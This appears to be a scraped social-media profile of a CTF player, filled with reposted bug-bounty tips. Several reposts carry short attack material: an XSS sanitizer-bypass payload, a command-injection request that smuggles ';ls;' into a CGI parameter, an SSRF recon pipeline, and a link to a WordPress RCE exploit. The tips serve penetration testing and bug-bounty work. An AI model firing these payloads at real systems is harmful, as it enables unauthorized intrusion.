@__AaRAP Profile picture

AAraAp

@__AaRAP

ctf-player

Joined February 2020
Similar User
Nasim Mostakim (TomCat) 🇧🇩 photo

@Ontu404

Inthomy Hadi Wiyono photo

@inthomyhadi

LĒON photo

@SaipulMhd

MASPLEH~ photo

@Bukanranuuu

keket photo

@prettyvegun

nya! ฅ⁠(^⁠•⁠ﻌ⁠•⁠^⁠ฅ) photo

@kucingrembessss

Dewi Humairoh photo

@dedewor

সমীর ರಕ್ಷಿತ್ 🇮🇳 photo

@rakshitmca

reta photo

@chintyareta

nimas photo

@amadea_12

AAraAp Reposted

BeeXSS is an automated tool to detect Blind XSS vulnerabilities in web applications. It injects payload, bypasses WAFs, and identifies backend execution flaws. Check it out here: github.com/AnonKryptiQuz/… #CyberSecurity #BlindXSS #Pentesting #BugBounty #hackingtools #redteam


AAraAp Reposted

Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots.. $ ~ waybackurls root.com |cut -d "/" -f 4-|sort -u > endpoints.txt #bugbountytips by @111xNagashy #BugBounty

Tweet Image 1

AAraAp Reposted

JS Review and Abuse GraphQL Result 10xBAC + Admin Panel ATO medium.com/@0xbugatti/js-… #bugbounty #bugbountytips #bugbountytip


AAraAp Reposted

“SOQL injection in SalesForce Apex earned me $$$$$” by Rooted0x01 rooted0x01.medium.com/soql-injection…

Tweet Image 1

AAraAp Reposted

Bypassing Multipart Parsers: File upload validation blog.sicuranext.com/breaking-down-… Credits Andrea Menin #infosec

Tweet Image 1
Tweet Image 2

AAraAp Reposted

Phishing email check

Tweet Image 1

AAraAp Reposted

Mass Account Takeover via Reset Password Credit: SNISS medium.com/@sniss_thomas/…


AAraAp Reposted

Security Tweet - Day 96 Simplest recon to test for SSRF findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace YOUR.burpcollaborator.net #cybersec #Awareness #Tweet #script #streaking


AAraAp Reposted

📲 jshunter By @fccdll JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for…

Tweet Image 1

AAraAp Reposted

Search across a half million git repos in Grep website. Grep : Grep.app

Tweet Image 1

AAraAp Reposted

~Phone number injection Check out my latest and last recon on Bumble.Where l found a bug 👀 youtu.be/274dN8GH9l8 #bugbounty #bugbountytips

Tweet Image 1

AAraAp Reposted

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

Tweet Image 1
Tweet Image 2
Tweet Image 3

AAraAp Reposted

0-click RCE Exploit for CVE-2024-10924 that affects 4 million WP sites 🤪 Secure your site ASAP! #WordPress #BugBounty #BugBountyTips

Tweet Image 1
Tweet Image 2

AAraAp Reposted

My Recon Engine will help you to find xss Recon Engine link github.com/freelancermija… URLFuzzer link github.com/freelancermija… Payloads link github.com/freelancermija… Youtube video link youtu.be/u6YNOindyOQ #BugBounty #hackerone #bugcrowd

Tweet Image 1

AAraAp Reposted

Command injection : Poc payload : GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ls;%27 HTTP/1.1 #BugBountyTips #BugBountyHunter

Tweet Image 1

AAraAp Reposted

🚀 IDOR

Tweet Image 1
Tweet Image 2
Tweet Image 3

AAraAp Reposted

Find GitHub Repositories for a Specific Keyword curl -s "api.github.com/search/reposit……" | jq '.items[] | {name: .name, url: .html_url}'

Tweet Image 1

AAraAp Reposted

🚨 𝟱𝟬 𝗥𝗘𝗣𝗢𝗦𝗧𝗦 𝗙𝗢𝗥 𝗔 𝟮𝟰-𝗛𝗢𝗨𝗥 𝗙𝗥𝗘𝗘 𝗖𝗢𝗨𝗥𝗦𝗘 𝗚𝗜𝗩𝗘𝗔𝗪𝗔𝗬! 🚨 If we hit 50 reposts on this post, I’ll make both of my courses completely FREE for 24 hours with lifetime access included: Business Logic for Bug Bounties Resource Bundle for Bug Bounties…

Tweet Image 1

AAraAp Reposted

$500: •Use 2 accounts (same role, RBAC). Enable MFA on one. •Intercept MFA-enabled account's requests. Add cookies/Auth Bearer to Autorize. •Browse with the non-MFA account to find unprotected endpoints. effortless access control checks😌 #bugbountytip #BugBounty

Tweet Image 1

Loading...

Something went wrong.


Something went wrong.